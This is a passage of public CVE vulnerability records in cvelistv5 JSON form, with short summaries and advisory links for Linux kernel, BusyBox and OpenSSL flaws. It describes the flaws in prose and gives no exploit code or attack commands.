{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:02:43.760Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2161713" }, { "tags": [ "x_transferred" ], "url": "https://seclists.org/oss-sec/2023/q1/20" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/171601/Kernel-Live-Patch-Security-Notice-LNS-0093-1.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230511-0003/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "unknown" } ] } ], "descriptions": [ { "lang": "en", "value": "A buffer overflow vulnerability was found in the Netfilter subsystem in the Linux Kernel. This issue could allow the leakage of both stack and heap addresses, and potentially allow Local Privilege Escalation to the root user via arbitrary code execution." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-190", "description": "CWE-190", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-05-11T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2161713" }, { "url": "https://seclists.org/oss-sec/2023/q1/20" }, { "url": "http://packetstormsecurity.com/files/171601/Kernel-Live-Patch-Security-Notice-LNS-0093-1.html" }, { "url": "https://security.netapp.com/advisory/ntap-20230511-0003/" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-0179", "datePublished": "2023-03-27T00:00:00", "dateReserved": "2023-01-11T00:00:00", "dateUpdated": "2024-08-02T05:02:43.760Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-28831
Vulnerability from cvelistv5
Published
2021-03-19 04:01
Modified
2024-08-03 21:55
Severity ?
EPSS score ?
Summary
decompress_gunzip.c in BusyBox through 1.32.1 mishandles the error bit on the huft_build result pointer, with a resultant invalid free or segmentation fault, via malformed gzip data.
References
▼ | URL | Tags |
---|---|---|
https://git.busybox.net/busybox/commit/?id=f25d254dfd4243698c31a4f3153d4ac72aa9e9bd | x_refsource_MISC | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZASBW7QRRLY5V2R44MQ4QQM4CZIDHM2U/ | vendor-advisory, x_refsource_FEDORA | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z7ZIFKPRR32ZYA3WAA2NXFA3QHHOU6FJ/ | vendor-advisory, x_refsource_FEDORA | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3UDQGJRECXFS5EZVDH2OI45FMO436AC4/ | vendor-advisory, x_refsource_FEDORA | |
https://lists.debian.org/debian-lts-announce/2021/04/msg00001.html | mailing-list, x_refsource_MLIST | |
https://security.gentoo.org/glsa/202105-09 | vendor-advisory, x_refsource_GENTOO |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T21:55:12.232Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://git.busybox.net/busybox/commit/?id=f25d254dfd4243698c31a4f3153d4ac72aa9e9bd" }, { "name": "FEDORA-2021-e82915eee1", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZASBW7QRRLY5V2R44MQ4QQM4CZIDHM2U/" }, { "name": "FEDORA-2021-d20c8a4730", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z7ZIFKPRR32ZYA3WAA2NXFA3QHHOU6FJ/" }, { "name": "FEDORA-2021-2024803354", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3UDQGJRECXFS5EZVDH2OI45FMO436AC4/" }, { "name": "[debian-lts-announce] 20210401 [SECURITY] [DLA 2614-1] busybox security update", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00001.html" }, { "name": "GLSA-202105-09", "tags": [ "vendor-advisory", "x_refsource_GENTOO", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202105-09" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "decompress_gunzip.c in BusyBox through 1.32.1 mishandles the error bit on the huft_build result pointer, with a resultant invalid free or segmentation fault, via malformed gzip data." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AC:L/AV:N/A:H/C:N/I:N/PR:N/S:U/UI:N", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2021-05-26T09:06:11", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://git.busybox.net/busybox/commit/?id=f25d254dfd4243698c31a4f3153d4ac72aa9e9bd" }, { "name": "FEDORA-2021-e82915eee1", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZASBW7QRRLY5V2R44MQ4QQM4CZIDHM2U/" }, { "name": "FEDORA-2021-d20c8a4730", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z7ZIFKPRR32ZYA3WAA2NXFA3QHHOU6FJ/" }, { "name": "FEDORA-2021-2024803354", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3UDQGJRECXFS5EZVDH2OI45FMO436AC4/" }, { "name": "[debian-lts-announce] 20210401 [SECURITY] [DLA 2614-1] busybox security update", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00001.html" }, { "name": "GLSA-202105-09", "tags": [ "vendor-advisory", "x_refsource_GENTOO" ], "url": "https://security.gentoo.org/glsa/202105-09" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2021-28831", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "decompress_gunzip.c in BusyBox through 1.32.1 mishandles the error bit on the huft_build result pointer, with a resultant invalid free or segmentation fault, via malformed gzip data." } ] }, "impact": { "cvss": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AC:L/AV:N/A:H/C:N/I:N/PR:N/S:U/UI:N", "version": "3.1" } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://git.busybox.net/busybox/commit/?id=f25d254dfd4243698c31a4f3153d4ac72aa9e9bd", "refsource": "MISC", "url": "https://git.busybox.net/busybox/commit/?id=f25d254dfd4243698c31a4f3153d4ac72aa9e9bd" }, { "name": "FEDORA-2021-e82915eee1", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZASBW7QRRLY5V2R44MQ4QQM4CZIDHM2U/" }, { "name": "FEDORA-2021-d20c8a4730", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z7ZIFKPRR32ZYA3WAA2NXFA3QHHOU6FJ/" }, { "name": "FEDORA-2021-2024803354", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UDQGJRECXFS5EZVDH2OI45FMO436AC4/" }, { "name": "[debian-lts-announce] 20210401 [SECURITY] [DLA 2614-1] busybox security update", "refsource": "MLIST", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00001.html" }, { "name": "GLSA-202105-09", "refsource": "GENTOO", "url": "https://security.gentoo.org/glsa/202105-09" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2021-28831", "datePublished": "2021-03-19T04:01:54", "dateReserved": "2021-03-19T00:00:00", "dateUpdated": "2024-08-03T21:55:12.232Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3606
Vulnerability from cvelistv5
Published
2022-10-19 00:00
Modified
2024-08-03 01:14
Severity ?
EPSS score ?
Summary
A vulnerability was found in Linux Kernel. It has been classified as problematic. This affects the function find_prog_by_sec_insn of the file tools/lib/bpf/libbpf.c of the component BPF. The manipulation leads to null pointer dereference. It is recommended to apply a patch to fix this issue. The identifier VDB-211749 was assigned to this vulnerability.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:14:02.479Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=d0d382f95a9270dcf803539d6781d6bd67e3f5b2" }, { "tags": [ "x_transferred" ], "url": "https://vuldb.com/?id.211749" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "Linux", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A vulnerability was found in Linux Kernel. It has been classified as problematic. This affects the function find_prog_by_sec_insn of the file tools/lib/bpf/libbpf.c of the component BPF. The manipulation leads to null pointer dereference. It is recommended to apply a patch to fix this issue. The identifier VDB-211749 was assigned to this vulnerability." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-404", "description": "CWE-404 Denial of Service -\u003e CWE-476 NULL Pointer Dereference", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-10-19T00:00:00", "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "shortName": "VulDB" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=d0d382f95a9270dcf803539d6781d6bd67e3f5b2" }, { "url": "https://vuldb.com/?id.211749" } ], "title": "Linux Kernel BPF libbpf.c find_prog_by_sec_insn null pointer dereference", "x_generator": "vuldb.com" } }, "cveMetadata": { "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "assignerShortName": "VulDB", "cveId": "CVE-2022-3606", "datePublished": "2022-10-19T00:00:00", "dateReserved": "2022-10-19T00:00:00", "dateUpdated": "2024-08-03T01:14:02.479Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3649
Vulnerability from cvelistv5
Published
2022-10-21 00:00
Modified
2024-08-03 01:14
Severity ?
EPSS score ?
Summary
A vulnerability was found in Linux Kernel. It has been classified as problematic. Affected is the function nilfs_new_inode of the file fs/nilfs2/inode.c of the component BPF. The manipulation leads to use after free. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211992.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:14:03.289Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=d325dc6eb763c10f591c239550b8c7e5466a5d09" }, { "tags": [ "x_transferred" ], "url": "https://vuldb.com/?id.211992" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230214-0009/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "Linux", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A vulnerability was found in Linux Kernel. It has been classified as problematic. Affected is the function nilfs_new_inode of the file fs/nilfs2/inode.c of the component BPF. The manipulation leads to use after free. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211992." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 3.1, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-119", "description": "CWE-119 Memory Corruption -\u003e CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-02-14T00:00:00", "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "shortName": "VulDB" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=d325dc6eb763c10f591c239550b8c7e5466a5d09" }, { "url": "https://vuldb.com/?id.211992" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" }, { "url": "https://security.netapp.com/advisory/ntap-20230214-0009/" } ], "title": "Linux Kernel BPF inode.c nilfs_new_inode use after free", "x_generator": "vuldb.com" } }, "cveMetadata": { "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "assignerShortName": "VulDB", "cveId": "CVE-2022-3649", "datePublished": "2022-10-21T00:00:00", "dateReserved": "2022-10-21T00:00:00", "dateUpdated": "2024-08-03T01:14:03.289Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-40768
Vulnerability from cvelistv5
Published
2022-09-18 00:00
Modified
2024-08-03 12:28
Severity ?
EPSS score ?
Summary
drivers/scsi/stex.c in the Linux kernel through 5.19.9 allows local users to obtain sensitive information from kernel memory because stex_queuecommand_lck lacks a memset for the PASSTHRU_CMD case.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T12:28:41.522Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.openwall.com/lists/oss-security/2022/09/09/1" }, { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/all/20220908145154.2284098-1-gregkh%40linuxfoundation.org/" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/log/drivers/scsi/stex.c" }, { "name": "[oss-security] 20220919 Re: Linux kernel: information disclosure in stex_queuecommand_lck", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/09/19/1" }, { "name": "FEDORA-2022-2cfbe17910", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GGHENNMLCWIQV2LLA56BJNFIUZ7WB4IY/" }, { "name": "FEDORA-2022-b948fc3cfb", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VNN3VFQPECS6D4PS6ZWD7AFXTOSJDSSR/" }, { "name": "FEDORA-2022-1a5b125ac6", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/S2KTU5LFZNQS7YNGE56MT46VHMXL3DD2/" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6022f210461fef67e6e676fd8544ca02d1bcfa7a" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "drivers/scsi/stex.c in the Linux kernel through 5.19.9 allows local users to obtain sensitive information from kernel memory because stex_queuecommand_lck lacks a memset for the PASSTHRU_CMD case." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-03-25T00:40:31.462230", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://www.openwall.com/lists/oss-security/2022/09/09/1" }, { "url": "https://lore.kernel.org/all/20220908145154.2284098-1-gregkh%40linuxfoundation.org/" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/log/drivers/scsi/stex.c" }, { "name": "[oss-security] 20220919 Re: Linux kernel: information disclosure in stex_queuecommand_lck", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2022/09/19/1" }, { "name": "FEDORA-2022-2cfbe17910", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GGHENNMLCWIQV2LLA56BJNFIUZ7WB4IY/" }, { "name": "FEDORA-2022-b948fc3cfb", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VNN3VFQPECS6D4PS6ZWD7AFXTOSJDSSR/" }, { "name": "FEDORA-2022-1a5b125ac6", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/S2KTU5LFZNQS7YNGE56MT46VHMXL3DD2/" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" }, { "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6022f210461fef67e6e676fd8544ca02d1bcfa7a" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-40768", "datePublished": "2022-09-18T00:00:00", "dateReserved": "2022-09-18T00:00:00", "dateUpdated": "2024-08-03T12:28:41.522Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-36946
Vulnerability from cvelistv5
Published
2022-07-27 00:00
Modified
2024-08-03 10:21
Severity ?
EPSS score ?
Summary
nfqnl_mangle in net/netfilter/nfnetlink_queue.c in the Linux kernel through 5.18.14 allows remote attackers to cause a denial of service (panic) because, in the case of an nf_queue verdict with a one-byte nfta_payload attribute, an skb_pull can encounter a negative skb->len.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T10:21:32.314Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://marc.info/?l=netfilter-devel\u0026m=165883202007292\u0026w=2" }, { "name": "DSA-5207", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5207" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20220901-0007/" }, { "name": "[debian-lts-announce] 20220911 [SECURITY] [DLA 3102-1] linux-5.10 new package", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00011.html" }, { "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=99a63d36cb3ed5ca3aa6fcb64cffbeaf3b0fb164" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "nfqnl_mangle in net/netfilter/nfnetlink_queue.c in the Linux kernel through 5.18.14 allows remote attackers to cause a denial of service (panic) because, in the case of an nf_queue verdict with a one-byte nfta_payload attribute, an skb_pull can encounter a negative skb-\u003elen." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-03-25T00:40:11.457258", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://marc.info/?l=netfilter-devel\u0026m=165883202007292\u0026w=2" }, { "name": "DSA-5207", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2022/dsa-5207" }, { "url": "https://security.netapp.com/advisory/ntap-20220901-0007/" }, { "name": "[debian-lts-announce] 20220911 [SECURITY] [DLA 3102-1] linux-5.10 new package", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00011.html" }, { "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html" }, { "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=99a63d36cb3ed5ca3aa6fcb64cffbeaf3b0fb164" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-36946", "datePublished": "2022-07-27T00:00:00", "dateReserved": "2022-07-27T00:00:00", "dateUpdated": "2024-08-03T10:21:32.314Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-2068
Vulnerability from cvelistv5
Published
2022-06-21 14:45
Modified
2024-09-16 19:41
Severity ?
EPSS score ?
Summary
In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze).
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T00:24:44.279Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.openssl.org/news/secadv/20220621.txt" }, { "tags": [ "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=2c9c35870601b4a44d86ddbf512b38df38285cfa" }, { "tags": [ "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=9639817dac8bbbaa64d09efad7464ccc405527c7" }, { "tags": [ "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9" }, { "name": "DSA-5169", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5169" }, { "name": "FEDORA-2022-3b7d0abd0b", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20220707-0008/" }, { "name": "FEDORA-2022-41890e9e44", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/" }, { "tags": [ "x_transferred" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "OpenSSL", "vendor": "OpenSSL", "versions": [ { "status": "affected", "version": "Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3)" }, { "status": "affected", "version": "Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o)" }, { "status": "affected", "version": "Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze)" } ] } ], "credits": [ { "lang": "en", "value": "Chancen (Qingteng 73lab)" } ], "datePublic": "2022-06-21T00:00:00", "descriptions": [ { "lang": "en", "value": "In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze)." } ], "metrics": [ { "other": { "content": { "lang": "eng", "url": "https://www.openssl.org/policies/secpolicy.html#Moderate", "value": "Moderate" }, "type": "unknown" } } ], "problemTypes": [ { "descriptions": [ { "description": "Command injection", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-01-10T00:00:00", "orgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "shortName": "openssl" }, "references": [ { "url": "https://www.openssl.org/news/secadv/20220621.txt" }, { "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=2c9c35870601b4a44d86ddbf512b38df38285cfa" }, { "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=9639817dac8bbbaa64d09efad7464ccc405527c7" }, { "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9" }, { "name": "DSA-5169", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2022/dsa-5169" }, { "name": "FEDORA-2022-3b7d0abd0b", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/" }, { "url": "https://security.netapp.com/advisory/ntap-20220707-0008/" }, { "name": "FEDORA-2022-41890e9e44", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/" }, { "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf" } ], "title": "The c_rehash script allows command injection" } }, "cveMetadata": { "assignerOrgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "assignerShortName": "openssl", "cveId": "CVE-2022-2068", "datePublished": "2022-06-21T14:45:20.597138Z", "dateReserved": "2022-06-13T00:00:00", "dateUpdated": "2024-09-16T19:41:46.658Z", "state": "PUBLISHED" }, 